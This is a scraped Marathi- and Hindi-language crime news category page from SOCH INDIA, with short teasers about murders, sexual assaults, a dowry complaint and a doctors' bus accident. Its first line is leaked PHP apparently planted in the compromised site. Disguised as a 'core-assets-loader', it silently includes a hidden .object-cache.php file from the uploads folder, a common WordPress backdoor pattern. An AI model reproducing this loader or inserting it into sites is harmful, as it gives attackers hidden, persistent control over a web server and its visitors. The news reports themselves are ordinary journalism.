add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अपराध समाचार – SOCH INDIA
Menu

पुण्यामध्ये दहीहंडीचा बॅनर लावण्यावरून झालेल्या वादात पाच जणांनी तलवारीने वार करत एका २४ वर्षीय दुकानदाराची हत्या केल्याची घटना ताजी असतानाच येथे आणखी एक धक्कादायक घटना उघडकीस आली आहे. पुण्यातील आंबेगाव खुर्द येथे एका तरुणाने दहीहंडीची वर्गणी दिली नाही या कारणास्तव दुचाकी जाळल्याची घटना घडली आहे. या प्रकरणी चौघांना अटक करण्यात...

Read More

एका वैद्यकीय परिषदेसाठी मुंबईहून औरंगाबादला निघालेल्या डॉक्टरांच्या बसचा अहमदनगरजवळील केडगाव येथे भीषण अपघात झाला. या अपघातात बसचालक ठार झाला असून ३० डॉक्टर जखमी झाले आहेत. मुंबईतील टाटा कॅन्सर रुग्णालय आणि इतर काही रुग्णालयांतील डॉक्टर असे ४० जण या बसमध्ये होते. जखमींमध्ये महिला डॉक्टरांचाही समावेश असून सर्वांना अहमदनगर शहरातील रुग्णालयात...

Read More

सोशल मीडिया हा आपल्या सगळ्यांच्या गळ्यातील ताईत झाला आहे. यातही व्हॉटस अॅपचा वापर सर्वाधिक होताना दिसतो. व्हॉटसअॅपवरच्या सगळ्याच ग्रुपमध्ये आपण तितकेच अॅक्टीव्ह असतो असे नाही पण बऱ्याच ग्रुपमध्ये आपला सहभाग असतो. अशाच एका ग्रुपमधून अॅडमिनने बाहेर काढल्याचा राग मनात ठेऊन एका व्यक्तीने अॅडमिनवर थेट बंदूक उगारली. त्यानंतर अॅडमिनच्या बाजूने...

Read More

कल्याणमध्ये माणुसकीला लाजवणारी घटना समोर आली आहे. एका महिलेने नवरा आणि त्याच्या मित्रा विरोधात बलात्काराची तक्रार दाखल केली आहे. नवऱ्याने आणि त्याच्या मित्राने मिळून महिलेवर सामूहिक बलात्कार केला. पीडित महिलेने कोळसेवाडी पोलीस ठाण्यात दोघांविरोधात तक्रार नोंदवली आहे. १७ ऑगस्टला नवऱ्याने त्याच्या मित्राला घरी बोलावले होते. त्यांनी गुंगीचे औषध मिसळून...

Read More

बांगलादेशचा क्रिकेटपटू मोसादक हुसेनच्या पत्नीने हुंड्यासाठी आपला छळ होत असल्याचा आरोप केला आहे. हुंडा न दिल्यामुळे मोसादकने आपल्याला घरातून बाहेर काढल्याचंही पत्नी शर्मिन समायराने म्हटलं आहे. सहा वर्षांपूर्वी मोसादक आणि शर्मिन यांचा विवाह झाला होता. १३ सप्टेंबरपासून युएईमध्ये होणाऱ्या आशिया चषकासाठी बांगलादेशच्या संघात मोसादकचा समावेश करण्यात आला आहे. ढाका...

Read More

मित्राला उधार दिलेले 500 रुपये परत मागितल्याने मित्रानेच मित्राचा खून केल्याचा धक्कादायक प्रकार घडला आहे. दिल्लीतील कल्याणपुरी येथील ही घटना आहे. 500 रुपये परत मागितल्याने 2 मित्रांमध्ये वाद झाला. ज्य़ामध्ये 24 वर्षाच्या युवकाची हत्या करण्यात आली. या हत्येत आणखी 2 जण देखील शामील असल्याची माहिती आहे. मित्राचाच खून पोलिसांनी...

Read More

बिहार के भोजपुर जिले में एक महिला को दिनदहाड़े निर्वस्त्र कर पिटाई करने और सरे बाज़ार घुमाने के मामले में पुलिस ने 360 लोगों के खिलाफ 3 मुकदमें दर्ज किए हैं. जिनमें नामजद 15 लोगों को पुलिस ने गिरफ्तार कर लिया है. सोमवार को एक युवक की लाश मिलने...

Read More

नवी मुंबईतील शिवसेना नगरसेवकावर विनयभंगाचा गुन्हा दाखल करण्यात आला आहे. नामदेव भगत असे त्यांचे नाव आहे. १९ वर्षीय तरूणींने त्यांच्यावर बलात्काराचा आरोप केला आहे. पोलिसांनी तरूणीच्या तक्रारीनुसार त्यांच्यावर गुन्हा दाखल केला आहे. नामदेव भगत हे नवी मुंबईतील नेरुळमधून शिवसेनेचे नगरसेवक आहेत. नवी मुंबई महानगरपालिकेत सध्या स्थायी समिती सदस्य आहेत....

Read More

भोपाळ खासगी वसतिगृह बलात्कार प्रकरणात आणखी एक महिला समोर आली असून तिने संचालकावर गंभीर स्वरुपाचे आरोप केले आहेत. वसतिगृहाच्या संचालकाने मला बंधन बनवून ठेवले व सलग सहा महिने आपल्यावर बलात्कार केला असा आरोप पीडित महिलेने केला आहे. भोपाळ वसतिगृह बलात्कार प्रकरणात समोर आलेली ही चौथी महिला आहे. मागच्या आठवडयात...

Read More

देश में महिला शोषण के मामले हर रोज आग की तरह फैलते जा रहे हैं. इसी बीच खबर सरकारी विभाग से है जहां उत्तरप्रदेश सरकार के वाणिज्य कर विभाग के नोएडा ऑफिस में पदस्थ डिप्टी कमिश्नर पंकज कुमार सिंह पर उनकी एक सहकर्मी महिला ने मध्य प्रदेश की राजधानी...

Read More